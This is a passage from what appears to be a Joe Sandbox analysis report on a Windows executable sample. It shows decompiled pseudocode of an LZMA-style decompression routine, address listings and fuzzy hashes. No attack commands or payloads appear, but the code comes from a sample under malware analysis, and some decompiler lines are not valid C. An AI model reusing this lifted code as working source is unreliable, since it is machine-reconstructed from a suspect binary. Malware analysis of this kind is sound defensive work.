                                                  										case 0xf:
                                                  											L58:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xf;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t203 = __ebp - 0x70;
                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t203;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L60:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												L55:
                                                  												__al =  *(__ebp - 0x44);
                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  												goto L56;
                                                  											}
                                                  											L61:
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__edx = __ebx + __ebx;
                                                  											__ecx =  *(__ebp - 0x10);
                                                  											__esi = __edx + __eax;
                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												_t217 = __edx + 1; // 0x1
                                                  												__ebx = _t217;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L60;
                                                  											} else {
                                                  												goto L58;
                                                  											}
                                                  										case 0x10:
                                                  											L110:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x10;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t366 = __ebp - 0x70;
                                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t366;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											goto L112;
                                                  										case 0x11:
                                                  											L69:
                                                  											__esi =  *(__ebp - 0x58);
                                                  											 *(__ebp - 0x84) = 0x12;
                                                  											L132:
                                                  											 *(_t612 - 0x54) = _t605;
                                                  											goto L133;
                                                  										case 0x12:
                                                  											goto L0;
                                                  										case 0x13:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												_t469 = __ebp - 0x58;
                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  												__eflags =  *_t469;
                                                  												 *(__ebp - 0x30) = 0x10;
                                                  												 *(__ebp - 0x40) = 8;
                                                  												goto L144;
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											 *(__ebp - 0x30) = 8;
                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  											goto L130;
                                                  										case 0x14:
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  											__eax =  *(__ebp - 0x80);
                                                  											L140:
                                                  											 *(_t612 - 0x88) = _t533;
                                                  											goto L1;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  											__al = __al & 0x000000fd;
                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  											goto L121;
                                                  										case 0x16:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__eflags = __eax - 4;
                                                  											if(__eax >= 4) {
                                                  												_push(3);
                                                  												_pop(__eax);
                                                  											}
                                                  											__ecx =  *(__ebp - 4);
                                                  											 *(__ebp - 0x40) = 6;
                                                  											__eax = __eax << 7;
                                                  											 *(__ebp - 0x7c) = 0x19;
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											goto L145;
                                                  										case 0x17:
                                                  											goto L145;
                                                  										case 0x18:
                                                  											L146:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x18;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t484 = __ebp - 0x70;
                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t484;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L148:
                                                  											_t487 = __ebp - 0x48;
                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                  											__eflags =  *_t487;
                                                  											goto L149;
                                                  										case 0x19:
                                                  											__eflags = __ebx - 4;
                                                  											if(__ebx < 4) {
                                                  												 *(__ebp - 0x2c) = __ebx;
                                                  												L120:
                                                  												_t394 = __ebp - 0x2c;
                                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                  												__eflags =  *_t394;
                                                  												L121:
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  													goto L170;
                                                  												}
                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                  													goto L171;
                                                  												}
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  												__eax =  *(__ebp - 0x30);
                                                  												_t401 = __ebp - 0x60;
                                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  												__eflags =  *_t401;
                                                  												goto L124;
                                                  											}
                                                  											__ecx = __ebx;
                                                  											__eax = __ebx;
                                                  											__ecx = __ebx >> 1;
                                                  											__eax = __ebx & 0x00000001;
                                                  											__ecx = (__ebx >> 1) - 1;
                                                  											__al = __al | 0x00000002;
                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                  											__eflags = __ebx - 0xe;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ebx >= 0xe) {
                                                  												__ebx = 0;
                                                  												 *(__ebp - 0x48) = __ecx;
                                                  												L103:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__eax = __eax + __ebx;
                                                  													 *(__ebp - 0x40) = 4;
                                                  													 *(__ebp - 0x2c) = __eax;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                  													__eflags = __eax;
                                                  													L109:
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													 *(__ebp - 0x50) = 1;
                                                  													 *(__ebp - 0x44) = 0;
                                                  													 *(__ebp - 0x48) = 0;
                                                  													L113:
                                                  													__eax =  *(__ebp - 0x40);
                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  														_t392 = __ebp - 0x2c;
                                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                  														__eflags =  *_t392;
                                                  														goto L120;
                                                  													}
                                                  													__eax =  *(__ebp - 0x50);
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__esi = __edi + __eax;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__ax =  *__esi;
                                                  													__ecx = __ax & 0x0000ffff;
                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                  														__ecx = 0;
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  														__ecx = 1;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  														__ebx = 1;
                                                  														__ecx =  *(__ebp - 0x48);
                                                  														__ebx = 1 << __cl;
                                                  														__ecx = 1 << __cl;
                                                  														__ebx =  *(__ebp - 0x44);
                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                  														__cx = __ax;
                                                  														__cx = __ax >> 5;
                                                  														__eax = __eax - __ecx;
                                                  														__edi = __edi + 1;
                                                  														__eflags = __edi;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  														 *__esi = __ax;
                                                  														 *(__ebp - 0x50) = __edi;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __edx;
                                                  														0x800 = 0x800 - __ecx;
                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  														 *__esi = __dx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L112:
                                                  														_t369 = __ebp - 0x48;
                                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                                  														__eflags =  *_t369;
                                                  														goto L113;
                                                  													} else {
                                                  														goto L110;
                                                  													}
                                                  												}
                                                  												__ecx =  *(__ebp - 0xc);
                                                  												__ebx = __ebx + __ebx;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													__ebx = __ebx | 0x00000001;
                                                  													__eflags = __ebx;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													L102:
                                                  													_t339 = __ebp - 0x48;
                                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                                  													__eflags =  *_t339;
                                                  													goto L103;
                                                  												} else {
                                                  													goto L100;
                                                  												}
                                                  											}
                                                  											__edx =  *(__ebp - 4);
                                                  											__eax = __eax - __ebx;
                                                  											 *(__ebp - 0x40) = __ecx;
                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  											goto L109;
                                                  										case 0x1a:
                                                  											L56:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1a;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x68);
                                                  											__al =  *(__ebp - 0x5c);
                                                  											__edx =  *(__ebp - 8);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  											 *( *(__ebp - 0x68)) = __al;
                                                  											__ecx =  *(__ebp - 0x14);
                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                  											__eax = __ecx + 1;
                                                  											__edx = 0;
                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t192;
                                                  											goto L80;
                                                  										case 0x1b:
                                                  											L76:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1b;
                                                  												goto L170;
                                                  											}
                                                  											__eax =  *(__ebp - 0x14);
                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                  												__eflags = __eax;
                                                  											}
                                                  											__edx =  *(__ebp - 8);
                                                  											__cl =  *(__eax + __edx);
                                                  											__eax =  *(__ebp - 0x14);
                                                  											 *(__ebp - 0x5c) = __cl;
                                                  											 *(__eax + __edx) = __cl;
                                                  											__eax = __eax + 1;
                                                  											__edx = 0;
                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t275;
                                                  											__eax =  *(__ebp - 0x68);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											_t284 = __ebp - 0x64;
                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                  											__eflags =  *_t284;
                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                  											L80:
                                                  											 *(__ebp - 0x14) = __edx;
                                                  											goto L81;
                                                  										case 0x1c:
                                                  											while(1) {
                                                  												L124:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t415 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t415;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  												__eflags =  *(__ebp - 0x30);
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												 *(__ebp - 0x14) = _t415;
                                                  												if( *(__ebp - 0x30) > 0) {
                                                  													continue;
                                                  												} else {
                                                  													L81:
                                                  													 *(__ebp - 0x88) = 2;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											 *(__ebp - 0x88) = 0x1c;
                                                  											L170:
                                                  											_push(0x22);
                                                  											_pop(_t567);
                                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                  											_t535 = 0;
                                                  											L172:
                                                  											return _t535;
                                                  									}
                                                  								}
                                                  								L171:
                                                  								_t535 = _t534 | 0xffffffff;
                                                  								goto L172;
                                                  							}
                                                  						}
                                                  						__eax =  *(__ebp - 0x50);
                                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  						__eax =  *(__ebp - 0x58);
                                                  						__esi = __edx + __eax;
                                                  						 *(__ebp - 0x54) = __esi;
                                                  						__ax =  *__esi;
                                                  						__edi = __ax & 0x0000ffff;
                                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  						if( *(__ebp - 0xc) >= __ecx) {
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  							__cx = __ax;
                                                  							__cx = __ax >> 5;
                                                  							__eax = __eax - __ecx;
                                                  							__edx = __edx + 1;
                                                  							 *__esi = __ax;
                                                  							 *(__ebp - 0x50) = __edx;
                                                  						} else {
                                                  							 *(__ebp - 0x10) = __ecx;
                                                  							0x800 = 0x800 - __edi;
                                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  							 *__esi = __cx;
                                                  						}
                                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                                  							goto L148;
                                                  						} else {
                                                  							goto L146;
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}








                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00000000
                                                  0x00406a56
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00000000
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00406bb9
                                                  0x00406bbf
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00406af8
                                                  0x00000000
                                                  0x0040696d

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                  • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                                                  • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                  • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E0040667F() {
                                                  				unsigned short _t532;
                                                  				signed int _t533;
